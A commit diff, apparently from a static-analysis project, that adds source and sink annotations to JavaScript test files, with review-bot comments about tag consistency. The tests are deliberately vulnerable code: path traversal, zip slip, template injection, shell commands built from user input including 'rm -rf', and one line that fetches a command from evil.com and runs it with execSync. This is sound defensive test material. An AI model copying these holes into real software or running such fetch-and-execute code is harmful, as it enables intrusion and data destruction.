JS: Accept Sources/Sink tags

Asger F
2025-02-26 13:57:10 +01:00
parent 19cada38ff
commit 64d39da5f8
211 changed files with 796 additions and 796 deletions


@@ -1,6 +1,6 @@
let externalLib = require('external-lib');
let untrusted = window.name;
let untrusted = window.name; // $ Source
externalLib(untrusted); // $ Alert
externalLib({x: untrusted}); // $ Alert


@@ -4,7 +4,7 @@ import { parse } from 'url';
import { join } from 'path';
var server = createServer(function(req, res) {
let path = parse(req.url, true).query.path;
let path = parse(req.url, true).query.path; // $ Source
res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system
});


@@ -6,7 +6,7 @@ var fs = require('fs'),
;
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system
@@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) {
path = sanitize(path);
res.write(fs.readFileSync(path)); // OK - Path is sanitized
path = url.parse(req.url, true).query.path;
path = url.parse(req.url, true).query.path; // $ Source
// OK - basename is safe
res.write(fs.readFileSync(pathModule.basename(path)));
res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved
@@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) {
})();
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert
fs.realpath(path,
@@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
require('send')(req, path); // $ Alert
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
// Removal of forward-slash or dots.
res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, '')));
@@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) {
const cp = require("child_process");
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
cp.execSync("foobar", {cwd: path}); // $ Alert
cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert
cp.execFileSync("foobar", {cwd: path}); // $ Alert
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
// Removal of forward-slash or dots.
res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), '')));
@@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute


@@ -5,7 +5,7 @@ const fs = require('fs'),
const ROOT = "/var/www/";
var server = http.createServer(function(req, res) {
let filePath = url.parse(req.url, true).query.path;
let filePath = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system.
});


@@ -8,7 +8,7 @@ var fs = require('fs'),
let app = express();
app.get('/basic', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync('./' + path); // $ Alert
@@ -18,7 +18,7 @@ app.get('/basic', (req, res) => {
});
app.get('/normalize', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync('./' + path); // $ Alert
@@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => {
});
app.get('/normalize-notAbsolute', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (pathModule.isAbsolute(path))
return;
@@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => {
});
app.get('/normalize-noInitialDotDot', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (path.startsWith(".."))
return;
@@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => {
app.get('/prepend-normalize', (req, res) => {
// Coerce to relative prior to normalization
let path = pathModule.normalize('./' + req.query.path);
let path = pathModule.normalize('./' + req.query.path); // $ Source
if (!path.startsWith(".."))
fs.readFileSync(path);
@@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => {
});
app.get('/absolute', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
if (!pathModule.isAbsolute(path))
return;
@@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => {
});
app.get('/normalized-absolute', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (!pathModule.isAbsolute(path))
return;
@@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => {
});
app.get('/realpath', (req, res) => {
let path = fs.realpathSync(req.query.path);
let path = fs.realpathSync(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert
@@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => {
});
app.get('/coerce-relative', (req, res) => {
let path = pathModule.join('.', req.query.path);
let path = pathModule.join('.', req.query.path); // $ Source
if (!path.startsWith('..'))
fs.readFileSync(path);
@@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => {
});
app.get('/coerce-absolute', (req, res) => {
let path = pathModule.join('/home/user/www', req.query.path);
let path = pathModule.join('/home/user/www', req.query.path); // $ Source
if (path.startsWith('/home/user/www'))
fs.readFileSync(path);
@@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => {
});
app.get('/concat-after-normalization', (req, res) => {
let path = 'foo/' + pathModule.normalize(req.query.path);
let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source
if (!path.startsWith('..'))
fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check
@@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => {
});
app.get('/noDotDot', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (path.includes('..'))
return;
@@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => {
});
app.get('/join-regression', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
// Regression test for a specific corner case:
// Some guard nodes sanitize both branches, but for a different set of flow labels.
@@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => {
});
app.get('/decode-after-normalization', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (!pathModule.isAbsolute(path) && !path.startsWith('..'))
fs.readFileSync(path);
@@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => {
});
app.get('/replace', (req, res) => {
let path = pathModule.normalize(req.query.path).replace(/%20/g, ' ');
let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source
if (!pathModule.isAbsolute(path)) {
fs.readFileSync(path); // $ Alert
@@ -233,7 +233,7 @@ app.get('/replace', (req, res) => {
});
app.get('/resolve-path', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => {
});
app.get('/relative-startswith', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => {
var isPathInside = require("is-path-inside"),
pathIsInside = require("path-is-inside");
app.get('/pseudo-normalizations', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
if (isPathInside(path, SAFE)) {
fs.readFileSync(path);
@@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => {
});
app.get('/yet-another-prefix', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => {
var rootPath = process.cwd();
app.get('/yet-another-prefix2', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => {
import slash from 'slash';
app.get('/slash-stuff', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => {
});
app.get('/dotdot-regexp', (req, res) => {
let path = pathModule.normalize(req.query.x);
let path = pathModule.normalize(req.query.x); // $ Source
if (pathModule.isAbsolute(path))
return;
fs.readFileSync(path); // $ Alert
@@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => {
});
app.get('/dotdot-matchAll-regexp', (req, res) => {
let path = pathModule.normalize(req.query.x);
let path = pathModule.normalize(req.query.x); // $ Source
if (pathModule.isAbsolute(path))
return;
fs.readFileSync(path); // $ Alert


@@ -6,7 +6,7 @@ var http = require("http"),
originalFs = require("original-fs");
var server = http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
gracefulFs.readFileSync(path); // $ Alert
@@ -35,7 +35,7 @@ function getFsModule(special) {
var util = require("util");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
util.promisify(fs.readFileSync)(path); // $ Alert
require("bluebird").promisify(fs.readFileSync)(path); // $ Alert
@@ -46,7 +46,7 @@ http.createServer(function(req, res) {
const asyncFS = require("./my-async-fs-module");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
asyncFS.readFileSync(path); // $ Alert
@@ -65,7 +65,7 @@ http.createServer(function(req, res) {
const mkdirp = require("mkdirp");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
mkdirp(path); // $ Alert
@@ -78,7 +78,7 @@ function func(x) {
const fsp = require("fs/promises");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fsp.readFile(path); // $ Alert
});


@@ -3,7 +3,7 @@ const prettier = require("prettier");
const app = express();
app.get('/some/path', function (req, res) {
const { p } = req.params;
const { p } = req.params; // $ Source
prettier.resolveConfig(p).then((options) => { // $ Alert
const formatted = prettier.format("foo", options);
});


@@ -2,7 +2,7 @@ const puppeteer = require('puppeteer');
const parseTorrent = require('parse-torrent');
(async () => {
let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data";
let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source
const browser = await puppeteer.launch();
const page = await browser.newPage();


@@ -10,7 +10,7 @@ function getTree(req, res, options) {
var workspaceId = req.params.workspaceId;
var realfileRootPath = workspaceId; // getfileRoot(workspaceId);
var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]);
withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {});
withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source
}
function getfileRoot(workspaceId) {
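Review bot: The new `$ Source` tag lands on the second `req.params.workspaceId` read (the `withStatsAndETag(...)` call) while the first read two lines up, `var workspaceId = req.params.workspaceId;`, stays untagged, and the body of `getTree` starts outside this hunk so the reason is not visible here. If the harness now verifies Source tags, a reader cannot tell whether the first read is deliberately excluded or simply missed; a short comment such as `// $ Source - only this read reaches a sink; the workspaceId local above is a dead copy` (or tagging the first line as well) would settle it. This is an inference from the visible lines only — the query's actual source model may justify the placement.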


@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -36,7 +36,7 @@ server.listen();
var nodefs = require('node:fs');
var server2 = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
nodefs.readFileSync(path); // $ Alert
});
@@ -45,6 +45,6 @@ server2.listen();
const chownr = require("chownr");
var server3 = http.createServer(function (req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
chownr(path, "someuid", "somegid", function (err) {}); // $ Alert
});


@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
doRead(Promise.resolve(path));
});


@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path.substring(i, j));
fs.readFileSync(path.substring(4)); // $ Alert
fs.readFileSync(path.substring(0, i)); // $ Alert


@@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'),
fs = require('fs');
function getTorrentData(dir, torrent){
let name = parseTorrent(torrent).name,
let name = parseTorrent(torrent).name, // $ Source
loc = dir + "/" + name + ".torrent.data";
return fs.readFileSync(loc); // $ Alert
}


@@ -6,7 +6,7 @@ var fs = require('fs'),
;
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system


@@ -5,7 +5,7 @@ fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
entry.pipe(fs.createWriteStream(fileName));
entry.pipe(fs.createWriteStream(fileName)); // $ Sink
});
var Writer = require('fstream').Writer;
@@ -13,14 +13,14 @@ fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
entry.pipe(Writer({path: fileName}));
entry.pipe(Writer({path: fileName})); // $ Sink
});
fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
var file = fs.openSync(fileName, "w");
var file = fs.openSync(fileName, "w"); // $ Sink
});
const JSZip = require('jszip');
@@ -28,11 +28,11 @@ const zip = new JSZip();
const path = require('path');
function doZipSlip() {
for (const name in zip.files) { // $ Alert
fs.createWriteStream(name);
fs.createWriteStream(name); // $ Sink
}
zip.forEach((name, file) => { // $ Alert
fs.createWriteStream(name);
fs.createWriteStream(name); // $ Sink
});
const extractTo = path.resolve("/some/path/to/extract/to");
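Review bot: The taint origin in this section is left with only `// $ Alert` on the `entry.path` reads and on the `for (const name in zip.files)` / `zip.forEach((name, file)` loops, whereas the rest of this commit tags origins with `$ Source` and only adds `$ Sink` here. If the harness now checks Source tags, these lines presumably want `// $ Alert Source`; if keeping the Alert on the origin line is intentional for this query, a one-line comment on the first entry saying so would stop the next reader from "fixing" it. The same Alert-only pattern appears in later sections where origin and sink share a line, e.g. `exec(getInput('data')); // $ Alert` and `cp.exec("cmd.sh " + process.argv[2]); // $ Alert`, so whichever convention is chosen should be applied there too.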


@@ -3,6 +3,6 @@ var unzip = require('unzip');
fs.readFile('path/to/archive.zip', function (err, zipContents) {
unzip.Parse(zipContents).on('entry', function (entry) {
var fileName = 'output/path/' + entry.path; // $ Alert
fs.writeFileSync(fileName, entry.contents);
fs.writeFileSync(fileName, entry.contents); // $ Sink
});
});


@@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip')
.pipe(unzipper.Parse())
.on('entry', function (entry) {
var fileName = entry.path; // $ Alert
entry.pipe(fs.createWriteStream(fileName));
entry.pipe(fs.createWriteStream(fileName)); // $ Sink
});


@@ -4,8 +4,8 @@ app.set('view engine', 'hbs');
app.use(require('body-parser').json());
app.use(require('body-parser').urlencoded({ extended: false }));
app.post('/path', function(req, res) {
var bodyParameter = req.body.bodyParameter;
var queryParameter = req.query.queryParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
var queryParameter = req.query.queryParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
res.render('template', queryParameter); // $ Alert


@@ -3,7 +3,7 @@ var app = require('express')();
app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) );
app.set('view engine', '.hbs')
app.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) {
var app4 = require('express')();
app4.set('view engine', 'ejs');
app4.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -31,7 +31,7 @@ var app5 = require('express')();
app5.engine("foobar", require("consolidate").whiskers);
app5.set('view engine', 'foobar');
app5.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -39,7 +39,7 @@ var app6 = require('express')();
app6.register(".html", require("consolidate").whiskers);
app6.set('view engine', 'html');
app6.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -48,7 +48,7 @@ var router = express.Router();
var app7 = express();
app7.set('view engine', 'ejs');
router.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
app7.use("/router", router);


@@ -5,7 +5,7 @@ const { exec } = require('child_process');
// function to echo title
function echo_title() {
// get the title from the event pull request
const title = github.context.payload.pull_request.title;
const title = github.context.payload.pull_request.title; // $ Source
exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert
if (err) {
return;
@@ -15,7 +15,7 @@ function echo_title() {
// function which passes the issue title into an exec
function exec_head_ref() {
const head_ref = github.context.payload.pull_request.head.ref;
const head_ref = github.context.payload.pull_request.head.ref; // $ Source
aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert
console.log(res);
});


@@ -3,7 +3,7 @@ var cp = require("child_process"),
url = require('url');
var server = http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Sink Source
cp.exec("foo");
cp.execSync("foo");
@@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) {
sh = 'cmd.exe', flag = '/c';
else
sh = '/bin/sh', flag = '-c';
cp.spawn(sh, [ flag, cmd ]); // $ Alert
cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink
let args = [];
args[0] = "-c";
args[1] = cmd;
args[1] = cmd; // $ Sink
cp.execFile("/bin/bash", args); // $ Alert
args = [];
args[0] = "-c";
args[1] = cmd;
args[1] = cmd; // $ Sink
run("sh", args);
args = [];
args[0] = `-` + "c";
args[1] = cmd;
args[1] = cmd; // $ Sink
cp.execFile(`/bin` + "/bash", args); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink
let myArgs = [];
myArgs.push(`-` + "c");
@@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) {
});
function run(cmd, args) {
function run(cmd, args) { // $ Sink
cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build.
}
var util = require("util")
http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
util.promisify(cp.exec)(cmd); // $ Alert
});
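Review bot: Tag order is inconsistent within this section: the first changed line reads `// $ Sink Source` while every other combined tag here and in the sibling child_process sections reads `// $ Alert Sink`; `// $ Source Sink` would match the alphabetical-style ordering used elsewhere, assuming the harness treats the tags as an unordered set (if order is significant, this line deserves a comment saying why). The `function run(cmd, args) { // $ Sink` tag on a declaration line is also unusual; it presumably marks the `args` parameter, which the existing comment two lines down tries to explain — a clearer version would be `// $ Alert - the sink is the \`args\` parameter, which the caller builds`, and that would also fix the "is build" typo.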


@@ -12,10 +12,10 @@ function getShell() {
function execSh(command, options) {
var shell = getShell()
return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert
return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink
}
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
execSh(cmd);
});


@@ -7,10 +7,10 @@ function getShell() {
}
function execSh(command, options) {
return cp.spawn(getShell(), ["-c", command], options) // $ Alert
return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink
};
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
execSh(cmd);
});


@@ -15,6 +15,6 @@ function execEach(commands) {
};
require('http').createServer(function(req, res) {
let cmd = require('url').parse(req.url, true).query.path;
let cmd = require('url').parse(req.url, true).query.path; // $ Source
execEach([cmd]);
});


@@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) {
});
app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) {
req.files.forEach(file => {
req.files.forEach(file => { // $ Source
exec("touch " + file.originalname); // $ Alert
})
});
@@ -21,7 +21,7 @@ var Busboy = require('busboy');
http.createServer(function (req, res) {
var busboy = new Busboy({ headers: req.headers });
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) {
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source
exec("touch " + filename); // $ Alert
});
req.pipe(busboy);
@@ -32,12 +32,12 @@ const formidable = require('formidable');
app.post('/api/upload', (req, res, next) => {
let form = formidable({ multiples: true });
form.parse(req, (err, fields, files) => {
form.parse(req, (err, fields, files) => { // $ Source
exec("touch " + fields.name); // $ Alert
});
let form2 = new formidable.IncomingForm();
form2.parse(req, (err, fields, files) => {
form2.parse(req, (err, fields, files) => { // $ Source
exec("touch " + fields.name); // $ Alert
});
});
@@ -49,13 +49,13 @@ http.createServer(function (req, res) {
// parse a file upload
var form = new multiparty.Form();
form.parse(req, function (err, fields, files) {
form.parse(req, function (err, fields, files) { // $ Source
exec("touch " + fields.name); // $ Alert
});
var form2 = new multiparty.Form();
form2.on('part', function (part) { // / file / field
form2.on('part', function (part) { // $ Source - / file / field
exec("touch " + part.filename); // $ Alert
});
form2.parse(req);


@@ -2,7 +2,7 @@ var http = require("http"),
url = require("url");
var server = http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
require("cross-spawn").sync(cmd); // $ Alert
require("execa").shell(cmd); // $ Alert


@@ -2,7 +2,7 @@ let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
res.on("data", command => { // $ Source
cp.execSync(command); // $ Alert
})
);


@@ -9,6 +9,6 @@ function test(e) {
exec(e['GITHUB_ACTION']);
}
test(process.env);
test(process.env); // $ Source
exec(getInput('data')); // $ Alert
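Review bot: `test(process.env); // $ Source` marks a source whose only visible sink, `exec(e['GITHUB_ACTION'])` inside `test`, carries no `$ Alert`, so the expectation file now asserts a source with no corresponding result and a reader cannot tell whether that is an expected non-finding or a missed tag. The body of `test` starts outside this hunk, so this may be resolved there; if not, a comment on the call such as `// $ Source - no Alert expected: GITHUB_ACTION is not a user-controlled key` (adjusted to the real reason) would document the intent.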


@@ -7,7 +7,7 @@ var cp = require("child_process");
cp.exec("cmd.sh " + process.argv[1]);
cp.exec("cmd.sh " + process.argv[2]); // $ Alert
var args = process.argv.slice(2);
var args = process.argv.slice(2); // $ Source
cp.execSync(args[0]); // $ Alert
cp.execSync("cmd.sh " + args[0]); // $ Alert
@@ -21,7 +21,7 @@ var cp = require("child_process");
});
(function() {
const args = process.argv.slice(2);
const args = process.argv.slice(2); // $ Source
const script = path.join(packageDir, 'app', 'index.js');
cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert
cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert
@@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
var args = require('yargs') // eslint-disable-line
.command('serve [port]', 'start the server', (yargs) => { })
.option('verbose', { foo: "bar" })
.argv
.argv // $ Source
cp.exec("cmd.sh " + args); // $ Alert
@@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
const {
argv: {
...args
},
}, // $ Source
} = require('yargs')
.usage('Usage: foo bar')
.command();
cp.exec("cmd.sh " + args); // $ Alert
var tainted1 = require('yargs').argv;
var tainted2 = require('yargs').parse()
var tainted1 = require('yargs').argv; // $ Source
var tainted2 = require('yargs').parse() // $ Source
const {taint1: {...taint1rest},taint2: {...taint2rest}} = {
taint1: tainted1,
@@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1
cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2
var {...taint3} = require('yargs').argv;
var {...taint3} = require('yargs').argv; // $ Source
cp.exec("cmd.sh " + taint3); // $ Alert
var [...taint4] = require('yargs').argv;
var [...taint4] = require('yargs').argv; // $ Source
cp.exec("cmd.sh " + taint4); // $ Alert
});
(function () {
const argv = process.argv.slice(2);
const argv = process.argv.slice(2); // $ Source
var minimist = require("minimist");
cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert
@@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert
import args from 'args'
var flags = args.parse(process.argv);
var flags = args.parse(process.argv); // $ Source
cp.exec("cmd.sh " + flags.foo); // $ Alert
var flags = require('arg')({...spec});
var flags = require('arg')({...spec}); // $ Source
cp.exec("cmd.sh " + flags.foo); // $ Alert
})
@@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
(function () {
const commandLineArgs = require('command-line-args');
const options = commandLineArgs(optionDefinitions);
const options = commandLineArgs(optionDefinitions); // $ Source
cp.exec("cmd.sh " + options.foo); // $ Alert
});
(function () {
const meow = require('meow');
const cli = meow(`helpstring`, {flags: {...flags}});
const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source
cp.exec("cmd.sh " + cli.input[0]); // $ Alert
});
@@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
(function () {
var dashdash = require('dashdash');
var opts = dashdash.parse({options: options});
var opts = dashdash.parse({options: options}); // $ Source
cp.exec("cmd.sh " + opts.foo); // $ Alert
var parser = dashdash.createParser({options: options});
var opts = parser.parse();
var opts = parser.parse(); // $ Source
cp.exec("cmd.sh " + opts.foo); // $ Alert
});
(function () {
const { program } = require('commander');
const { program } = require('commander'); // $ Source
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert


@@ -3,14 +3,14 @@ const app = express();
const { execFile } = require("child_process");
app.get("/", (req, res) => {
const remote = req.query.remote;
const remote = req.query.remote; // $ Source
execFile("git", ["ls-remote", remote]); // $ Alert
execFile("git", ["fetch", remote]); // $ Alert
indirect("git", ["ls-remote", remote]); // $ Alert
const myArgs = req.query.args;
const myArgs = req.query.args; // $ Source
execFile("git", myArgs); // $ Alert


@@ -2,6 +2,6 @@
const cp = require("child_process");
module.exports.thisMethodIsImported = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.thisMethodIsImported = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}


@@ -1,44 +1,44 @@
var cp = require("child_process")
module.exports.blah = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.blah = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.execFile(name, [name]);
cp.execFile(name, name);
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.foo.bar = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.foo.bar = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
function cla() { }
cla.prototype.method = function (name) {
cp.exec("rm -rf " + name); // $ Alert
cla.prototype.method = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.cla = new cla();
function cla2() { }
cla2.prototype.method = function (name) {
cp.exec("rm -rf " + name); // $ Alert
cla2.prototype.method = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.bla = new cla2();
module.exports.lib2 = require("./lib2.js")
class Cla3 {
constructor(name) {
cp.exec("rm -rf " + name); // $ Alert
constructor(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
static foo(name) {
cp.exec("rm -rf " + name); // $ Alert
